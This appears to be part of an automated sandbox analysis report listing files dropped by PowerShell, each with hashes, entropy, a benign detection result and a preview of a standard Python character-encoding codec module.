                                                                                                                                                                                                                      SHA-512:18FFEC059B44077627A86139D2861509E28DC8564FC9B5F822C79E21E8A43043780469221B66743D5BFEF84552C3F787E25B721B87B2422A0AFCBCEC84953AE8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_16 generated from 'MAPPINGS/ISO8859/8859-16.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-16',.. enc
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13711
                                                                                                                                                                                                                      Entropy (8bit):4.594295226318269
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:eHhsuOTDvR1UrXPLouhIAs2+ijLRG3RKjV:rTLuhIAlw4V
                                                                                                                                                                                                                      MD5:62DC1A7320D0B8FB3FB535E0F2055446
                                                                                                                                                                                                                      SHA1:02D0C9E5D224A0C6036C27C842EC54E3962681C3
                                                                                                                                                                                                                      SHA-256:D9102AE464030E5A0F4D1712435AC3BDB2FA98ECAA689B5965442EF92B13DFEC
                                                                                                                                                                                                                      SHA-512:29D58449D2B6216C9BB40E151E0133FC370D104C07C6960581B914495C8940B2B7C7B85E70514EB0D37313854A8EC2BDC3163406881B4521262CEBF26A385EAE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_2 generated from 'MAPPINGS/ISO8859/8859-2.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-2',.. encode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13396
                                                                                                                                                                                                                      Entropy (8bit):4.597193229637006
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:uHhsuOTDvRCUrXPLouhIAs2+ijLA/SI7JbrO:7TIuhIAltIBC
                                                                                                                                                                                                                      MD5:79D790F88E256CC8C968456344519BAB
                                                                                                                                                                                                                      SHA1:6EA401BBD3082D55BA2235D768A80BEA52E4759A
                                                                                                                                                                                                                      SHA-256:E372E25B32E8657DB9B57B3C9B53D68B67F3FC6651C53B071DCAC6CAB6662FCA
                                                                                                                                                                                                                      SHA-512:EDB436E11FE172A73DD899E163F3D05D1DB6214755FCCCD7311A1923EF5EE8F7530D353D1EEB9BE8B9E435F250509CD114CE540BC4F928B32000A64E05EB4E9C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_3 generated from 'MAPPINGS/ISO8859/8859-3.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-3',.. encode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13683
                                                                                                                                                                                                                      Entropy (8bit):4.589930243244332
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:yHhsuOTDvRvUrXPLouhIAs2+ijL4Eo6z+:/T5uhIAlhb+
                                                                                                                                                                                                                      MD5:4C0E2E5478CFC6B2A8134D5C5D3C76ED
                                                                                                                                                                                                                      SHA1:73749BA58832D716683A2F76354BB032A3123E78
                                                                                                                                                                                                                      SHA-256:164C26A1A13DC22A21A7F80E5C0176EA9223111B759D2ED1CD8B3C55AAB63BBD
                                                                                                                                                                                                                      SHA-512:C469837BC68A419D91FD8EB0D52A2164D557C3EEBDA6E7F2B1040D18DFC6F94BDA827CFAC0EF44BF8F19DDE6B732A9AF3A48214EE0AFB143600D3D77E98F1C59
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_4 generated from 'MAPPINGS/ISO8859/8859-4.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-4',.. encode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13322
                                                                                                                                                                                                                      Entropy (8bit):4.619153100357495
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:iHhsuOTDvRcUrXPLouhIAs2+ijL762Y+n:vT2uhIAlT62n
                                                                                                                                                                                                                      MD5:70CB514B7CD7B9A494A55CB257553431
                                                                                                                                                                                                                      SHA1:7F689F78B422164FDA39F897B45AAE7C8CCFE8DB
                                                                                                                                                                                                                      SHA-256:4622BB45469E23C852698A6B784B5E28AFD8072FDDB8E319C02D39B138CB9DBE
                                                                                                                                                                                                                      SHA-512:CCCA6974D74B32643D84198A626C28A6CC777B3D9853C90FDE3F61D54F8A41ED3C423CE2795402E6157A1529985C91E56B1D2C944EF3222E54CA8D2A232C0D6D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_5 generated from 'MAPPINGS/ISO8859/8859-5.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-5',.. encode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11140
                                                                                                                                                                                                                      Entropy (8bit):4.629970059245577
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:+HhsuOTDvRhUrXPLouhIAs2+ijLeCdxeiu5iEp30yfZn:LTnuhIAlUH
                                                                                                                                                                                                                      MD5:A69D78A4C1AB4134DC5033FA45821AAE
                                                                                                                                                                                                                      SHA1:C0B9008772067BF43B1A817780D6B86DFCD87EF8
                                                                                                                                                                                                                      SHA-256:1543F9AD8DCC4AA912C5C901A5A216A4EA3DB62FB19197A0D90CCC0EE69B4538
                                                                                                                                                                                                                      SHA-512:230E26A9366387FAE38340921C675D3AD3CD8580096824842FA9261EB1BBA391E399525425030854FAA9F84819E57F7F9F238426B809274A6D78676143AC9F3B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_6 generated from 'MAPPINGS/ISO8859/8859-6.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-6',.. encode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13151
                                                                                                                                                                                                                      Entropy (8bit):4.649031466938632
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:+HhsuOTDvReUrXPLouhIAs2+ijLEARfO21XHHjfvK8uHZh:LTEuhIAl8AN11XO8Aj
                                                                                                                                                                                                                      MD5:50BFFF8D67F78DF6B9941AD829159358
                                                                                                                                                                                                                      SHA1:D766C9E1E2EA76FB3CA67793F36A3F45C1545132
                                                                                                                                                                                                                      SHA-256:41FEB2BEC72E3F07C0D67F0E421FF8E51A8E1688AA20AF7C8A12CE0DDF464104
                                                                                                                                                                                                                      SHA-512:00EEA3F1B69FA47E0DA4B7AC0E4AD0E8830A6A3E845B3D340A4ACB4DB0838D01423B4FFAD94863178ECAD72FA1053868CE506C5AF3C010C76A29D11F2BB992C5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_7 generated from 'MAPPINGS/ISO8859/8859-7.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-7',.. encode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11343
                                                                                                                                                                                                                      Entropy (8bit):4.621650787612196
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:aHhsuOTDvR7UrXPLouhIAs2+ijLUSj6ZZPHxvi:3TluhIAlcSv
                                                                                                                                                                                                                      MD5:E873B80A7B474B64BA463354A5D1A39A
                                                                                                                                                                                                                      SHA1:58682E0EF443927AC206F8C0B70FB2636DD1C2C2
                                                                                                                                                                                                                      SHA-256:63D11B2592BDB036C8F4150EC1F968D1A6E01D22AF8D7DAF94F6C72E0A8FD752
                                                                                                                                                                                                                      SHA-512:185EA3AD52F3CE519171B5CBBB5BF7071C009A800121F368CD06118F1A82D37BA2A5526118D6A8B1117C5C9AD31699BD657903CDA9C4A25D6BB7D192C643C717
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_8 generated from 'MAPPINGS/ISO8859/8859-8.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-8',.. encode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13463
                                                                                                                                                                                                                      Entropy (8bit):4.569353880954753
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:KHhsuOTDvRIUrXPLouhIAs2+ijLMZt6B5TdjN:nTiuhIAlEZt69x
                                                                                                                                                                                                                      MD5:CAD4BC52AF4F5E24614AC8857D21DC35
                                                                                                                                                                                                                      SHA1:49BDA77039C166194660CAF30885E17951603F3E
                                                                                                                                                                                                                      SHA-256:FD0CCFDE95FCFEBF48BA5ED5F697C4799C3303B853077F48FFEF2FD9EF1E30C8
                                                                                                                                                                                                                      SHA-512:6CBDC2C1F97DB4A9A1BFD1D1601C55F946C82BB5AE2844DDECC98A1B760B7EB292EA393DFD2A1D45BA99906397861BF01E1C0C3430D8285B517724F06F19D10E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_9 generated from 'MAPPINGS/ISO8859/8859-9.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-9',.. encode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1062
                                                                                                                                                                                                                      Entropy (8bit):4.530496029691674
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nNqxOzSf/XokTZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj92FcJxFpz:Nqyzqt62VJjRU8njOxLnrxLbrLK8+Jx/
                                                                                                                                                                                                                      MD5:161F7EEDD0B4169D0A36DA2E7808EB7B
                                                                                                                                                                                                                      SHA1:35D8869963DBB870A4B9DF3C974DE9A5CF5F4E41
                                                                                                                                                                                                                      SHA-256:C83AA2098AB15FBAD7EB999C303B27350B0459EE9F6FC2B2BF4004D4285F9E8D
                                                                                                                                                                                                                      SHA-512:5219805C9AF0799449BA650FE4108B450A20A3864AC5CD7ADA83A5C2429F9604025E8F1F296A461600E73372779838971AB91F150060761597D670B4AB9ED531
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# johab.py: Python Unicode Codec for JOHAB..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_kr, codecs..import _multibytecodec as mbc....codec = _codecs_kr.getcodec('johab')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='johab',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14086
                                                                                                                                                                                                                      Entropy (8bit):4.696171438355166
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:veHhsuOTDvRnUrXPLouhIAs2+i4bur6Zv8muyEdP:vrT5uhIAl/euxP
                                                                                                                                                                                                                      MD5:75872A24381833D8B71D42A66523AA45
                                                                                                                                                                                                                      SHA1:C4AC11C4903178821FE680C732462C02626C016B
                                                                                                                                                                                                                      SHA-256:90A883B291D5F1E6DBB735413D51648C31580B1927500161C16624836D01E5EE
                                                                                                                                                                                                                      SHA-512:A84BD3BDBC4BCBFE90B550CB4FFB6CDBEBBB4B1C3824A931CBA448E84C79D4D6B05D9D67C0718FA97F790B8C1071C775010058306BCEC2769D4E721808CED8FF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec koi8_r generated from 'MAPPINGS/VENDORS/MISC/KOI8-R.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='koi8-r',.. encode=
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13501
                                                                                                                                                                                                                      Entropy (8bit):4.664370116157909
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:ahsuOTDvRNUrXPLouhIAs2+imIzDCYPfuyEdP:fTLuhIAl5jfuxP
                                                                                                                                                                                                                      MD5:B2F96B9A1CF37B7C81BE8704D4E62EF9
                                                                                                                                                                                                                      SHA1:AB37BF387BF19A833126952D139E41093DD217D9
                                                                                                                                                                                                                      SHA-256:86D922A935AFDE1BD7C22CF8A9F23A237511C92C51509A80051DD2862A84D09F
                                                                                                                                                                                                                      SHA-512:F139A2AAB199BB95905B6C020A6410D9FC1C67486BB8AF7796CE41BCC8CDE7AE034749F50728162BE836AE2D4ED74D4ED82282EE56517843C404412C72756ECE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec koi8_t.."""..# http://ru.wikipedia.org/wiki/...-8..# http://www.opensource.apple.com/source/libiconv/libiconv-4/libiconv/tests/KOI8-T.TXT....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return c
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14069
                                                                                                                                                                                                                      Entropy (8bit):4.689466302139651
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:SHhsuOTDvR6UrXPLouhIAs2+i4bur6e9zuyEdP:fTIuhIAl/5uxP
                                                                                                                                                                                                                      MD5:211B71B4C717939EDEDBFD33A9C726BE
                                                                                                                                                                                                                      SHA1:64DEB95FD1A59EC03B09643BE2F2055A079151E4
                                                                                                                                                                                                                      SHA-256:9F77F72F8A42A1BA97C7D53AFDB6F6A6D4E08707CAA4D4CD57D6C113156BB32B
                                                                                                                                                                                                                      SHA-512:3CBACB39A0994C5285E5B0316B3816916D43C6EE607398022B7BF05430A9621416C2F28A848C2E90B47BE147DDFFB7CF03D5CE8C129BFE52247D6AA238FF5639
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec koi8_u generated from 'python-mappings/KOI8-U.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='koi8-u',.. encode=Codec(
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14030
                                                                                                                                                                                                                      Entropy (8bit):4.572243714560591
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:Mn/GuINDBTXqJPnXEeXGyQCmEYcrj6CbwK+avSMcdgF:LNneXGy1lHwK+avSMNF
                                                                                                                                                                                                                      MD5:F4729A1242BD140B732D4BEE6E137558
                                                                                                                                                                                                                      SHA1:44EFA222BB2CA9ADD776C29A098F9F03FF03E515
                                                                                                                                                                                                                      SHA-256:DA8BAC477F14620D8AA89EB6CB8963602E1C39724148369C88EF48C95D495011
                                                                                                                                                                                                                      SHA-512:F5812E38B06620752A557FA70F207AA3298A2FEC7598107BCE749F5B1529A8CA92CAC5AD72E068F6F711C714868389861E93B25B484FA2AD13FC8B3A50EE797E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec kz1048 generated from 'MAPPINGS/VENDORS/MISC/KZ1048.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self, input, errors='strict'):.. return codecs.charmap_encode(input, errors, encoding_table).... def decode(self, input, errors='strict'):.. return codecs.charmap_decode(input, errors, decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input, self.errors, encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input, self.errors, decoding_table)[0]....class StreamWriter(Codec, codecs.StreamWriter):.. pass....class StreamReader(Codec, codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='kz1048',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1314
                                                                                                                                                                                                                      Entropy (8bit):4.724793488479122
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:J4OSEHV0yWJyWKMufQ2hQZUQWSJzWSJDtyWVyWg9ZKj9b1QJxFplR:J4OSJui6SJ6SJ8TKnQJxTz
                                                                                                                                                                                                                      MD5:92C4D5E13FE5ABECE119AA4D0C4BE6C5
                                                                                                                                                                                                                      SHA1:79E464E63E3F1728EFE318688FE2052811801E23
                                                                                                                                                                                                                      SHA-256:6D5A6C46FE6675543EA3D04D9B27CCCE8E04D6DFEB376691381B62D806A5D016
                                                                                                                                                                                                                      SHA-512:C95F5344128993E9E6C2BF590CE7F2CFFA9F3C384400A44C0BC3ACA71D666ED182C040EC495EA3AF83ABBD9053C705334E5F4C3F7C07F65E7031E95FDFB7A561
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
